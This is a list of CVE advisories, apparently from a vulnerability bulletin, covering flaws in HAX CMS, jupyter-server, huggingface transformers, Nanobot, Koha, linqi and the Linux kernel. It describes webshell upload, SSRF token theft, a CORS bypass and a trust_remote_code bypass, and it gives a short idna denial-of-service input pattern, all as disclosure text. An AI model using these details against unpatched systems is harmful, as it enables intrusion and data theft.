| haxtheweb--haxcms-php | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Starting in version 25.0.0 and prior to version 26.0.0, the haxcms_refresh_token cookie is set without the Secure flag. This allows it to be transmitted over unencrypted HTTP, making it vulnerable to theft via packet sniffing on the network. Version 26.0.0 fixes the issue. | 2026-06-05 | not yet calculated | CVE-2026-46398 | https://github.com/haxtheweb/issues/security/advisories/GHSA-g7v2-r32q-jf5v |
| haxtheweb--haxcms-php | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Starting in version 11.0.6 and prior to version 25.0.0, the file upload functionality in HAXCMS PHP only validates file extensions using a regex pattern without checking the actual file content or MIME type. This allows attackers to upload malicious files (e.g., PHP webshells) disguised as legitimate image files, potentially leading to remote code execution. Version 25.0.0 contains a fix for the issue. | 2026-06-05 | not yet calculated | CVE-2026-46400 | https://github.com/haxtheweb/issues/security/advisories/GHSA-ffxv-9qv2-v2v8 |
| haxtheweb--issues | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Versions prior to 26.0.0 suffer from an improper session termination vulnerability where authentication tokens remain valid after user logout. This allows attackers who obtain valid tokens to maintain persistent access to authenticated CMS functionality, bypassing the intended session termination mechanism and enabling unauthorized access to CMS metadata and administrative functions. Version 26.0.0 fixes the issue. | 2026-06-05 | not yet calculated | CVE-2026-46401 | https://github.com/haxtheweb/issues/security/advisories/GHSA-g5rc-4gpf-wx3w |
| HCLSoftware--Digital Experience | HCL Digital Experience is affected by an OS command injection vulnerability in the Digital Asset Management API. An attacker may execute arbitrary operating system commands, typically inheriting the privileges of the vulnerable application, which could possibly lead to a complete system takeover and data compromise. | 2026-06-05 | not yet calculated | CVE-2026-21837 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130849 |
| HKUDS--nanobot | Nanobot prior to version 0.2.1 contains a server-side request forgery vulnerability in the Microsoft Teams channel handler that allows remote attackers to exfiltrate Bot Framework bearer tokens by supplying a forged activity with an attacker-controlled serviceUrl value. Attackers can poison the stored conversation reference by sending a crafted inbound activity to the Teams webhook, causing subsequent bot replies to transmit token-bearing Authorization header requests to an attacker-controlled host. | 2026-06-01 | not yet calculated | CVE-2026-49139 | https://github.com/HKUDS/nanobot/releases/tag/v0.2.1 https://github.com/HKUDS/nanobot/pull/4047 https://github.com/HKUDS/nanobot/commit/232df45126bcf0f8fccd123d73714f202c8e8612 https://www.vulncheck.com/advisories/nanobot-ssrf-via-microsoft-teams-channel-serviceurl-poisoning |
| HMBRAND--DBI | DBI versions before 1.648 for Perl have a heap overflow when preparsing SQL statements with more than 9 binders. The preparse method expands SQL placeholder characters to numbered binders of the form :pN, but only allocates three characters per binder in the buffer. Placeholders 10-99 require four characters, 100-999 require five characters, et cetera. | 2026-06-05 | not yet calculated | CVE-2026-10879 | https://metacpan.org/release/HMBRAND/DBI-1.648/changes https://github.com/perl5-dbi/dbi/commit/af79036c07aa9a457971c0f4136e37c85dc20978.patch |
| HP Inc.--poly_trio_8300 | In certain scenarios when the admin has enabled Interactive Connectivity Establishment (ICE), a buffer overflow could enable remote code execution on Poly Voice products on the Linux platform. | 2026-06-01 | not yet calculated | CVE-2026-0826 | https://support.hp.com/us-en/document/ish_15052661-15052687-16/hpsbpy04083 |
| huggingface--huggingface/transformers | A vulnerability in the LightGlue model loading path of huggingface/transformers version 5.2.0 allows an attacker-controlled model repository to execute arbitrary code during model initialization. The issue arises because the `trust_remote_code` parameter, intended to prevent remote code execution, is overridden by untrusted serialized configuration data in a nested code path. Specifically, when loading a LightGlue model using `AutoModel.from_pretrained()` with `trust_remote_code=False`, the `LightGlueConfig` reads the `trust_remote_code` value from the untrusted `config.json` file and propagates it into nested `AutoConfig.from_pretrained()` calls. This results in the execution of attacker-provided Python modules, even when the victim explicitly disables remote code execution. The vulnerability poses a high risk for environments such as API inference servers, research notebooks, CI/CD pipelines, and model evaluation workers, potentially leading to credential theft, lateral movement, or persistence/backdoor deployment. | 2026-06-03 | not yet calculated | CVE-2026-5241 | https://huntr.com/bounties/ceb3ce1a-4c45-497a-b25e-cb9a7685e619 https://github.com/huggingface/transformers/commit/676559d5022b74aaa0cee1cee0842b7f27c5320e |
| Imagination Technologies--Graphics DDK | Kernel software installed and running inside a Guest/Host VM may post improper commands to the GPU Firmware to trigger a write of data outside the intended GPU memory. A logic error in the address translation allowed a compromised Host (Kernel) to perform arbitrary writes to firmware memory. | 2026-06-01 | not yet calculated | CVE-2026-34193 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/ |
| joomlacontenteditor.net--Joomla Content Editor (JCE) extension for Joomla | A vulnerability in the JCE editor extension for Joomla allows the creation of new editor profiles for unauthenticated users, ultimately resulting in PHP code upload and execution. | 2026-06-05 | not yet calculated | CVE-2026-48907 | https://www.joomlacontenteditor.net/ |
| jupyter--jupyter/jupyter | A path traversal vulnerability exists in jupyter-server version 2.17.0 due to an incorrect root directory boundary check in the _get_os_path() function within jupyter_server/services/contents/fileio.py. The check uses startswith(root) without appending a trailing path separator, allowing sibling directories with names starting with the same prefix as root_dir to bypass the check. Additionally, the to_os_path() function in utils.py does not strip ".." from path parts, enabling traversal sequences to bypass the vulnerable check. This vulnerability can lead to unauthorized read/write access to files in sibling directories, potentially exposing sensitive data in shared hosting environments. | 2026-06-02 | not yet calculated | CVE-2026-5422 | https://huntr.com/bounties/24a36953-6490-466f-8cb2-a90d1ca56e0f |
| jupyter--jupyter/jupyter | A vulnerability in jupyter-server versions 1.12.0 through 2.17.0 allows an attacker to bypass CORS origin validation when the `allow_origin_pat` configuration is used. The issue arises from the use of `re.match()` for validating the `Origin` header, which only anchors at the start of the string. This allows attacker-controlled domains such as `trusted.example.com.evil.com` to pass validation against patterns intended to match `trusted.example.com`. The vulnerability affects multiple locations in the codebase, including CORS headers, WebSocket connections, referer validation, and login redirects, potentially enabling phishing attacks, arbitrary code execution, and unauthorized access to sensitive API responses. | 2026-06-03 | not yet calculated | CVE-2026-6657 | https://huntr.com/bounties/18f642db-3569-43b3-b58d-ff97be4b09d7 |
| KAMSOFT--KS-SOMED | Use of hard-coded credentials in KS-SOMED allowed an unauthorized attacker access to FTP server that hosted the application's update packages. The attacker with these credentials could upload a malicious update file, which then may have been distributed and installed on client machines as a legitimate update. This issue affects KS-SOMED with modules: KSPLUPDFTP.exe up to 30.00.00.056 and ANEKSKLIENT.EXE up to 29.00.02.026 Beside removing the hard-coded credentials from the code and changing the update process, access granted by previously exposed credentials was limited to read-only. | 2026-06-01 | not yet calculated | CVE-2026-42251 | https://cert.pl/posts/2026/06/CVE-2026-1958 https://kamsoft.pl/ks-somed/ |
| Kimi--AI v.1.0 | A Cross Site Scripting vulnerability exists in the Kimi AI v1.0 web interface's 'Preview' feature. The application fails to properly sanitize or encode HTML/JavaScript payloads generated by the AI model. When a user switches to the 'Preview' tab to view AI-generated code, the malicious payload is rendered directly into the DOM, leading to arbitrary JavaScript execution in the victim's browser session. | 2026-06-03 | not yet calculated | CVE-2026-39107 | https://github.com/MGTx2 https://github.com/MGTx2/CVE-2026-39107 |
| kjd--idna | Internationalized Domain Names in Applications (IDNA) for Python provides support for Internationalized Domain Names in Applications (IDNA) and Unicode IDNA Compatibility Processing. In versions prior to 3.15, payloads such as `"\u0660" * N` or `"\u30fb" * N + "\u6f22"` utilize the `valid_contexto` function prior to length rejection, and for high values of `N` will take a long time to process. This is the same issue as CVE-2024-3651, however the original remediation in 2024 was not a complete fix. A specially crafted argument to the `idna.encode()` function could consume significant resources. This may lead to a denial-of-service. Starting in version 3.14, the function rejects long inputs as soon as practicable prior to any further processing to minimize resource consumption. In version 3.15, this approach was extended to lesser used alternate functions (i.e. per-label conversions and codec support). A workaround is available. Domain names cannot exceed 253 characters in length. If this length limit is enforced prior to passing the domain to the `idna.encode()` function, it should no longer consume significant resources. This is triggered by arbitrarily large inputs that would not occur in normal usage, but may be passed to the library assuming there is no preliminary input validation by the higher-level application. | 2026-06-05 | not yet calculated | CVE-2026-45409 | https://github.com/kjd/idna/security/advisories/GHSA-65pc-fj4g-8rjx |
| Koha--Koha | Cross Site Scripting vulnerability in Koha 25.11 and before allows a remote attacker to execute arbitrary code via file upload function in Invoice features | 2026-06-03 | not yet calculated | CVE-2026-26378 | https://github.com/Koha-Community/Koha https://g03m0n.github.io https://g03m0n.github.io/posts/cve-2026-26378/ |
| Koha--Koha | Koha versions up to 25.11 contain a Server-Side Request Forgery (SSRF) vulnerability via the Z39.50/SRU server configuration. This allows authenticated attackers to perform internal network scanning and identify running services by analyzing server response times. | 2026-06-03 | not yet calculated | CVE-2026-26379 | https://github.com/Koha-Community/Koha https://g03m0n.github.io/ https://g03m0n.github.io/posts/cve-2026-26379/ |
| Laravel-Backpack--CRUD | backpack/crud provides Create, Read, Update & Delete (CRUD) functions for Backpack, a collection of Laravel packages that help users build custom administration panels. Versions prior to 5.0.13, 4.1.69, and 4.0.63 are vulnerable to cross-site scripting. An attacker could conduct a targeted phishing campaign, in order to trick users or admins into clicking a malicious link, which under very specific circumstances could give them information or possibly admin access. Versions 5.0.13, 4.1.69, and 4.0.63 patch the issue. As a workaround, manually look inside error views in `resources/views/errors` and output `e($exception->getMessage())` instead of `$exception->getMessage()`. | 2026-06-03 | not yet calculated | CVE-2022-31114 | https://github.com/Laravel-Backpack/CRUD/security/advisories/GHSA-m8xx-3x29-84h8 |
| libxls--libxls | libxls through version 1.6.3 contains a use of uninitialized memory vulnerability in the OLE container parser. Memory allocated for the Master Sector Allocation Table (MSAT) in read_MSAT() is not fully initialized before being consumed by ole2_validate_sector_chain(), which may result in application crashes or potential information disclosure when processing a crafted XLS file | 2026-06-03 | not yet calculated | CVE-2026-26824 | https://github.com/libxls/libxls/issues/155 |
| libxls--libxls | A use-of-uninitialized memory vulnerability exists in libxls 1.6.3 when parsing malformed XLS files. The issue is reachable via xls_parseWorkBook() and is triggered by uninitialized heap memory originating from the OLE layer (ole2_read). The flaw is detectable with MemorySanitizer (MSAN) and can lead to undefined behavior, incorrect parsing logic, or potential information disclosure. | 2026-06-03 | not yet calculated | CVE-2026-26825 | https://github.com/libxls/libxls/issues/156 |
| linqi GmbH--linqi | An Improper Authentication vulnerability in the /api/Cdn/GetFile endpoint of linqi allows unauthenticated, remote attackers to bypass file access controls. The ValidateAnonFileAccess function incorrectly grants access if an 'AnonFile' query parameter containing exactly 256 characters is provided. While this flaw allows bypassing the intended authorization check, the actual security impact is negligible; the exposed resources are strictly limited to minified JavaScript and CSS files that contain no sensitive data and are already publicly accessible via a standard CDN. | 2026-06-05 | not yet calculated | CVE-2026-11345 | https://linqi.help/en/reference/security/security-advisories/#security-advisory-improper-authentication-bypass-in-cdn-file-access-in-linqi |
| linqi GmbH--linqi | A Server-Side Request Forgery (SSRF) vulnerability in the custom process creation feature of linqi allows an authenticated attacker to probe internal network components. By crafting a specific process containing an HTTP Request component, an attacker can force the server to send arbitrary HTTP requests. By observing the varying application responses (Success, Failed, or 504 Gateway Time-out), the attacker can determine the status of internal ports, leading to internal network reconnaissance. | 2026-06-05 | not yet calculated | CVE-2026-11346 | https://linqi.help/en/reference/security/security-advisories/#security-advisory-server-side-request-forgery-ssrf-allowing-internal-network-probing |
| linqi GmbH--linqi | The linqi application contains hardcoded cryptographic keys. Additionally, the application uses a weak algorithm with a limited ASCII charset to dynamically generate Initialization Vectors (IVs) for AES/CBC encryption, making known-plaintext attacks feasible. An attacker with local access can leverage these vulnerabilities to decrypt sensitive obfuscated strings, including ConnectionString values containing database credentials from appsettings.json. | 2026-06-05 | not yet calculated | CVE-2026-11347 | https://linqi.help/en/reference/security/security-advisories/#security-advisory-hardcoded-cryptographic-keys-and-weak-iv-generation-in-linqi |
| linqi GmbH--linqi | The Comment API (GET /api/Comment and POST /api/Comment) in the affected application fails to perform authorization checks to verify that the requesting user has access to the object identified by the relatedObjectId. This Insecure Direct Object Reference (IDOR) vulnerability allows any authenticated user to read and write comments on any process across all business units by supplying an arbitrary object GUID. | 2026-06-05 | not yet calculated | CVE-2026-11369 | https://linqi.help/en/reference/security/security-advisories/#security-advisory-insecure-direct-object-reference-idor-in-comment-api-in-linqi |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI: endpoint: Add missing NULL check for alloc_workqueue() alloc_workqueue() can return NULL on memory allocation failure. Without proper error checking, this may lead to a NULL pointer dereference when queue_work() is later called with the NULL workqueue pointer in epf_ntb_epc_init(). Add a NULL check immediately after alloc_workqueue() and return -ENOMEM on failure to prevent the driver from loading with an invalid workqueue pointer. | 2026-06-03 | not yet calculated | CVE-2025-71313 | https://git.kernel.org/stable/c/314eab6740bcda504ef978be599f805de05ce6de https://git.kernel.org/stable/c/03f336a869b3a3f119d3ae52ac9723739c7fb7b6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/panthor: Recover from panthor_gpu_flush_caches() failures We have seen a few cases where the whole memory subsystem is blocked and flush operations never complete. When that happens, we want to: - schedule a reset, so we can recover from this situation - in the reset path, we need to reset the pending_reqs so we can send new commands after the reset - if more panthor_gpu_flush_caches() operations are queued after the timeout, we skip them and return -EIO directly to avoid needless waits (the memory block won't miraculously work again) Note that we drop the WARN_ON()s because these hangs can be triggered with buggy GPU jobs created by the UMD, and there's no way we can prevent it. We do keep the error messages though. v2: - New patch v3: - Collect R-b - Explicitly mention the fact we dropped the WARN_ON()s in the commit message v4: - No changes | 2026-06-03 | not yet calculated | CVE-2025-71314 | https://git.kernel.org/stable/c/8ec4f1b14a6147db07d6e51aa1d6bcc799649847 https://git.kernel.org/stable/c/57753f2c64c033a21a7400b3a2192db1cd6c890e https://git.kernel.org/stable/c/2c899c6026fc9d39286735b30c4d8550d4ea075b https://git.kernel.org/stable/c/3c0a60195b37af83bbbaf223cd3a78945bace49e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Fix dc_link NULL handling in HPD init amdgpu_dm_hpd_init() may see connectors without a valid dc_link. The code already checks dc_link for the polling decision, but later unconditionally dereferences it when setting up HPD interrupts. Assign dc_link early and skip connectors where it is NULL. Fixes the below: drivers/gpu/drm/amd/amdgpu/../display/amdgpu_dm/amdgpu_dm_irq.c:940 amdgpu_dm_hpd_init() error: we previously assumed 'dc_link' could be null (see line 931) drivers/gpu/drm/amd/amdgpu/../display/amdgpu_dm/amdgpu_dm_irq.c 923 /* 924 * Analog connectors may be hot-plugged unlike other connector 925 * types that don't support HPD. Only poll analog connectors. 926 */ 927 use_polling |= 928 amdgpu_dm_connector->dc_link && ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ The patch adds this NULL check but hopefully it can be removed 929 dc_connector_supports_analog(amdgpu_dm_connector->dc_link->link_id.id); 930 931 dc_link = amdgpu_dm_connector->dc_link; dc_link assigned here. 932 933 /* 934 * Get a base driver irq reference for hpd ints for the lifetime 935 * of dm. Note that only hpd interrupt types are registered with 936 * base driver; hpd_rx types aren't. IOW, amdgpu_irq_get/put on 937 * hpd_rx isn't available. DM currently controls hpd_rx 938 * explicitly with dc_interrupt_set() 939 */ --> 940 if (dc_link->irq_source_hpd != DC_IRQ_SOURCE_INVALID) { ^^^^^^^^^^^^^^^^^^^^^^^ If it's NULL then we are trouble because we dereference it here. 941 irq_type = dc_link->irq_source_hpd - DC_IRQ_SOURCE_HPD1; 942 /* 943 * TODO: There's a mismatch between mode_info.num_hpd 944 * and what bios reports as the # of connectors with hpd | 2026-06-03 | not yet calculated | CVE-2026-46245 | https://git.kernel.org/stable/c/a490e4d3c9fed1e690c8de348416eea3a9f054ff https://git.kernel.org/stable/c/226a40c06a183abaeb7529a4f54d6c203bd14407 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: pm8916_lbc: Fix use-after-free for extcon in IRQ handler Using the `devm_` variant for requesting IRQ _before_ the `devm_` variant for allocating/registering the `extcon` handle, means that the `extcon` handle will be deallocated/unregistered _before_ the interrupt handler (since `devm_` naturally deallocates in reverse allocation order). This means that during removal, there is a race condition where an interrupt can fire just _after_ the `extcon` handle has been freed, *but* just _before_ the corresponding unregistration of the IRQ handler has run. This will lead to the IRQ handler calling `extcon_set_state_sync()` with a freed `extcon` handle. Which usually crashes the system or otherwise silently corrupts the memory... Fix this racy use-after-free by making sure the IRQ is requested _after_ the registration of the `extcon` handle. | 2026-06-03 | not yet calculated | CVE-2026-46246 | https://git.kernel.org/stable/c/9fab0120907e6965168e55b1e17cb9dfaf262b86 https://git.kernel.org/stable/c/47abfc207ab02cf1297257e282e8048da63f0d08 https://git.kernel.org/stable/c/48e0f68b50c344bb2d78d65dd98f93e41276ee00 https://git.kernel.org/stable/c/23067259919663580c6f81801847cfc7bd54fd1f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: qcom: gfx3d: add parent to parent request map After commit d228ece36345 ("clk: divider: remove round_rate() in favor of determine_rate()") determining GFX3D clock rate crashes, because the passed parent map doesn't provide the expected best_parent_hw clock (with the roundd_rate path before the offending commit the best_parent_hw was ignored). Set the field in parent_req in addition to setting it in the req, fixing the crash. clk_hw_round_rate (drivers/clk/clk.c:1764) (P) clk_divider_bestdiv (drivers/clk/clk-divider.c:336) divider_determine_rate (drivers/clk/clk-divider.c:358) clk_alpha_pll_postdiv_determine_rate (drivers/clk/qcom/clk-alpha-pll.c:1275) clk_core_determine_round_nolock (drivers/clk/clk.c:1606) clk_core_round_rate_nolock (drivers/clk/clk.c:1701) __clk_determine_rate (drivers/clk/clk.c:1741) clk_gfx3d_determine_rate (drivers/clk/qcom/clk-rcg2.c:1268) clk_core_determine_round_nolock (drivers/clk/clk.c:1606) clk_core_round_rate_nolock (drivers/clk/clk.c:1701) clk_core_round_rate_nolock (drivers/clk/clk.c:1710) clk_round_rate (drivers/clk/clk.c:1804) dev_pm_opp_set_rate (drivers/opp/core.c:1440 (discriminator 1)) msm_devfreq_target (drivers/gpu/drm/msm/msm_gpu_devfreq.c:51) devfreq_set_target (drivers/devfreq/devfreq.c:360) devfreq_update_target (drivers/devfreq/devfreq.c:426) devfreq_monitor (drivers/devfreq/devfreq.c:458) process_one_work (arch/arm64/include/asm/jump_label.h:36 include/trace/events/workqueue.h:110 kernel/workqueue.c:3284) worker_thread (kernel/workqueue.c:3356 (discriminator 2) kernel/workqueue.c:3443 (discriminator 2)) kthread (kernel/kthread.c:467) ret_from_fork (arch/arm64/kernel/entry.S:861) | 2026-06-03 | not yet calculated | CVE-2026-46247 | https://git.kernel.org/stable/c/82cfe5292b11deb1dc33822f67f73cfbe8eafe25 https://git.kernel.org/stable/c/547ae2f17349c7586953af5ef50de43ef3f65e9e https://git.kernel.org/stable/c/56360aa4ddd736fc19e6d0b0206c5e437e0d6ff8 https://git.kernel.org/stable/c/aed53da569fb96eec09b4817b1953bcc2e467eea https://git.kernel.org/stable/c/8aa972eba1f29068d13bec716d33abca30fb3f2a https://git.kernel.org/stable/c/2583cb925ca1ce450aa5d74a05a67448db970193 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath12k: clear stale link mapping of ahvif->links_map When an arvif is initialized in non-AP STA mode but MLO connection preparation fails before the arvif is created (arvif->is_created remains false), the error path attempts to delete all links. However, link deletion only executes when arvif->is_created is true. As a result, ahvif retains a stale entry of arvif that is initialized but not created. When a new arvif is initialized with the same link id, this stale mapping triggers the following WARN_ON. WARNING: drivers/net/wireless/ath/ath12k/mac.c:4271 at ath12k_mac_op_change_vif_links+0x140/0x180 [ath12k], CPU#3: wpa_supplicant/275 Call trace: ath12k_mac_op_change_vif_links+0x140/0x180 [ath12k] (P) drv_change_vif_links+0xbc/0x1a4 [mac80211] ieee80211_vif_update_links+0x54c/0x6a0 [mac80211] ieee80211_vif_set_links+0x40/0x70 [mac80211] ieee80211_prep_connection+0x84/0x450 [mac80211] ieee80211_mgd_auth+0x200/0x480 [mac80211] ieee80211_auth+0x14/0x20 [mac80211] cfg80211_mlme_auth+0x90/0xf0 [cfg80211] nl80211_authenticate+0x32c/0x380 [cfg80211] genl_family_rcv_msg_doit+0xc8/0x134 Fix this issue by unassigning the link vif and clearing ahvif->links_map if arvif is only initialized but not created. Tested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.5-01651-QCAHKSWPL_SILICONZ-1 | 2026-06-03 | not yet calculated | CVE-2026-46248 | https://git.kernel.org/stable/c/da289440f04c93048d82d293b180f1cacdfee2d9 https://git.kernel.org/stable/c/acd8319e834be6790e449701cb6df0f636801977 https://git.kernel.org/stable/c/2c1ba9c2adf0fda96eaaebd8799268a7506a8fc9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: octeontx2-af: Fix PF driver crash with kexec kernel booting During a kexec reboot the hardware is not power-cycled, so AF state from the old kernel can persist into the new kernel. When AF and PF drivers are built as modules, the PF driver may probe before AF reinitializes the hardware. The PF driver treats the RVUM block revision as an indication that AF initialization is complete. If this value is left uncleared at shutdown, PF may incorrectly assume AF is ready and access stale hardware state, leading to a crash. Clear the RVUM block revision during AF shutdown to avoid PF mis-detecting AF readiness after kexec. | 2026-06-03 | not yet calculated | CVE-2026-46249 | https://git.kernel.org/stable/c/b7605b9301abc18fbbf2b0e23fdd281fc768955d https://git.kernel.org/stable/c/9769a09afda20a006b528b9e723effcae45965b2 https://git.kernel.org/stable/c/57821d1436ba1c6a6973aa32d54166fdec35558c https://git.kernel.org/stable/c/8b5ed7c5417b7013d35b6f2507dab739013ba1a9 https://git.kernel.org/stable/c/7d56ba306e93d04696718963fb4cda2883ee7585 https://git.kernel.org/stable/c/9c3398e5b3a914b74276d44ab54c49123b89c61a https://git.kernel.org/stable/c/1370736836a18b5e0cd74bcc9cffe11d21f1fe79 https://git.kernel.org/stable/c/2d2d574309e3ae84ee794869a5da8b4c38753a94 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: regulator: core: fix locking in regulator_resolve_supply() error path If late enabling of a supply regulator fails in regulator_resolve_supply(), the code currently triggers a lockdep warning: WARNING: drivers/regulator/core.c:2649 at _regulator_put+0x80/0xa0, CPU#6: kworker/u32:4/596 ... Call trace: _regulator_put+0x80/0xa0 (P) regulator_resolve_supply+0x7cc/0xbe0 regulator_register_resolve_supply+0x28/0xb8 as the regulator_list_mutex must be held when calling _regulator_put(). To solve this, simply switch to using regulator_put(). While at it, we should also make sure that no concurrent access happens to our rdev while we clear out the supply pointer. Add appropriate locking to ensure that. While the code in question will be removed altogether in a follow-up commit, I believe it is still beneficial to have this corrected before removal for future reference. | 2026-06-03 | not yet calculated | CVE-2026-46252 | https://git.kernel.org/stable/c/c66e0db0f37290b53c57994f998bb55590364fd0 https://git.kernel.org/stable/c/497330b203d2c59c5ff3fa4c34d14494d7203bc3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: AppArmor: Allow apparmor to handle unaligned dfa tables The dfa tables can originate from kernel or userspace and 8-byte alignment isn't always guaranteed and as such may trigger unaligned memory accesses on various architectures. Resulting in the following [ 73.901376] WARNING: CPU: 0 PID: 341 at security/apparmor/match.c:316 aa_dfa_unpack+0x6cc/0x720 [ 74.015867] Modules linked in: binfmt_misc evdev flash sg drm drm_panel_orientation_quirks backlight i2c_core configfs nfnetlink autofs4 ext4 crc16 mbcache jbd2 hid_generic usbhid sr_mod hid cdrom sd_mod ata_generic ohci_pci ehci_pci ehci_hcd ohci_hcd pata_ali libata sym53c8xx scsi_transport_spi tg3 scsi_mod usbcore libphy scsi_common mdio_bus usb_common [ 74.428977] CPU: 0 UID: 0 PID: 341 Comm: apparmor_parser Not tainted 6.18.0-rc6+ #9 NONE [ 74.536543] Call Trace: [ 74.568561] [<0000000000434c24>] dump_stack+0x8/0x18 [ 74.633757] [<0000000000476438>] __warn+0xd8/0x100 [ 74.696664] [<00000000004296d4>] warn_slowpath_fmt+0x34/0x74 [ 74.771006] [<00000000008db28c>] aa_dfa_unpack+0x6cc/0x720 [ 74.843062] [<00000000008e643c>] unpack_pdb+0xbc/0x7e0 [ 74.910545] [<00000000008e7740>] unpack_profile+0xbe0/0x1300 [ 74.984888] [<00000000008e82e0>] aa_unpack+0xe0/0x6a0 [ 75.051226] [<00000000008e3ec4>] aa_replace_profiles+0x64/0x1160 [ 75.130144] [<00000000008d4d90>] policy_update+0xf0/0x280 [ 75.201057] [<00000000008d4fc8>] profile_replace+0xa8/0x100 [ 75.274258] [<0000000000766bd0>] vfs_write+0x90/0x420 [ 75.340594] [<00000000007670cc>] ksys_write+0x4c/0xe0 [ 75.406932] [<0000000000767174>] sys_write+0x14/0x40 [ 75.472126] [<0000000000406174>] linux_sparc_syscall+0x34/0x44 [ 75.548802] ---[ end trace 0000000000000000 ]--- [ 75.609503] dfa blob stream 0xfff0000008926b96 not aligned. [ 75.682695] Kernel unaligned access at TPC[8db2a8] aa_dfa_unpack+0x6e8/0x720 Work around it by using the get_unaligned_xx() helpers. | 2026-06-03 | not yet calculated | CVE-2026-46254 | https://git.kernel.org/stable/c/ec737e7fdf2f0ba7b203d4ec72cc915978b10e7e https://git.kernel.org/stable/c/23f112bd6144e815153462e12d313ac3e7027168 https://git.kernel.org/stable/c/cded636008bde2b397a7cf63b8299d7c303aaf6a https://git.kernel.org/stable/c/64802f731214a51dfe3c6c27636b3ddafd003eb0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dmaengine: fsl-edma: don't explicitly disable clocks in .remove() The clocks in fsl_edma_engine::muxclk are allocated and enabled with devm_clk_get_enabled(), which automatically cleans these resources up, but these clocks are also manually disabled in fsl_edma_remove(). This causes warnings on driver removal for each clock: edma_module already disabled WARNING: CPU: 0 PID: 418 at drivers/clk/clk.c:1200 clk_core_disable+0x198/0x1c8 [...] Call trace: clk_core_disable+0x198/0x1c8 (P) clk_disable+0x34/0x58 fsl_edma_remove+0x74/0xe8 [fsl_edma] [...] ---[ end trace 0000000000000000 ]--- edma_module already unprepared WARNING: CPU: 0 PID: 418 at drivers/clk/clk.c:1059 clk_core_unprepare+0x1f8/0x220 [...] Call trace: clk_core_unprepare+0x1f8/0x220 (P) clk_unprepare+0x34/0x58 fsl_edma_remove+0x7c/0xe8 [fsl_edma] [...] ---[ end trace 0000000000000000 ]--- Fix these warnings by removing the unnecessary fsl_disable_clocks() call in fsl_edma_remove(). | 2026-06-03 | not yet calculated | CVE-2026-46255 | https://git.kernel.org/stable/c/533d495f15e4c88ad5246c7f90ae026702e28d75 https://git.kernel.org/stable/c/68feac21bd4de7ae4faba05704c404861d991fcf https://git.kernel.org/stable/c/bda244871179543dd3be7d093236cb33b2fb1765 https://git.kernel.org/stable/c/b84dba68c4823da452cec99a5d213571a65d06de https://git.kernel.org/stable/c/666c53e94c1d0bf0bdf14c49505ece9ddbe725bc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: NFS/localio: prevent direct reclaim recursion into NFS via nfs_writepages LOCALIO is an NFS loopback mount optimization that avoids using the network for READ, WRITE and COMMIT if the NFS client and server are determined to be on the same system. But because LOCALIO is still fundamentally "just NFS loopback mount" it is susceptible to recursion deadlock via direct reclaim, e.g.: NFS LOCALIO down to XFS and then back into NFS via nfs_writepages. Fix LOCALIO's potential for direct reclaim deadlock by ensuring that all its page cache allocations are done from GFP_NOFS context. Thanks to Ben Coddington for pointing out commit ad22c7a043c2 ("xfs: prevent stack overflows from page cache allocation"). | 2026-06-03 | not yet calculated | CVE-2026-46256 | https://git.kernel.org/stable/c/ae26a4cf2baf0a44c538dc093504d1994b02dade https://git.kernel.org/stable/c/6a5de0c4fc0f217eea945d3d72c34ee30d72cbc9 https://git.kernel.org/stable/c/67435d2d8a33a75f9647724952cb1b18279d2e95 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clocksource/drivers/timer-sp804: Fix an Oops when read_current_timer is called on ARM32 platforms where the SP804 is not registered as the sched_clock. On SP804, the delay timer shares the same clkevt instance with sched_clock. On some platforms, when sp804_clocksource_and_sched_clock_init is called with use_sched_clock not set to 1, sched_clkevt is not properly initialized. However, sp804_register_delay_timer is invoked unconditionally, and read_current_timer() subsequently calls sp804_read on an uninitialized sched_clkevt, leading to a kernel Oops when accessing sched_clkevt->value. Declare a dedicated clkevt instance exclusively for delay timer, instead of sharing the same clkevt with sched_clock. This ensures that read_current_timer continues to work correctly regardless of whether SP804 is selected as the sched_clock. | 2026-06-03 | not yet calculated | CVE-2026-46257 | https://git.kernel.org/stable/c/693b0b594b0f278bafa784984129c0c0f988e352 https://git.kernel.org/stable/c/694921a93f3e3621e067afc545cedf6fe3b234a9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gpio: cdev: Avoid NULL dereference in linehandle_create() In linehandle_create(), there is a statement like this: retain_and_null_ptr(lh); Soon after, there is a debug printout that dereferences "lh", which will crash things. Avoid the crash by using handlereq.lines, which is the same value. | 2026-06-03 | not yet calculated | CVE-2026-46258 | https://git.kernel.org/stable/c/87b9d7a4cfbed5f42af440372026270af997c766 https://git.kernel.org/stable/c/6af6be278e3ba2ffb6af5b796c89dfb3f5d9063e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: wpcm-fiu: Fix potential NULL pointer dereference in wpcm_fiu_probe() platform_get_resource_byname() can return NULL, which would cause a crash when passed the pointer to resource_size(). Move the fiu->memory_size assignment after the error check for devm_ioremap_resource() to prevent the potential NULL pointer dereference. | 2026-06-03 | not yet calculated | CVE-2026-46261 | https://git.kernel.org/stable/c/9e5cb7e67fbdb8320d68d87db882a92b36f6a1d9 https://git.kernel.org/stable/c/2c538a0b3472e99c892c26f4940da38b7d87f632 https://git.kernel.org/stable/c/0f93a80eb3fd596ddc5730d05e0e8c88e1aa2891 https://git.kernel.org/stable/c/cb9b2dc34a9eef0855edb00ae9c9b7f72394281b https://git.kernel.org/stable/c/888a0a802c467bbe34a42167bdf9d7331333440a |
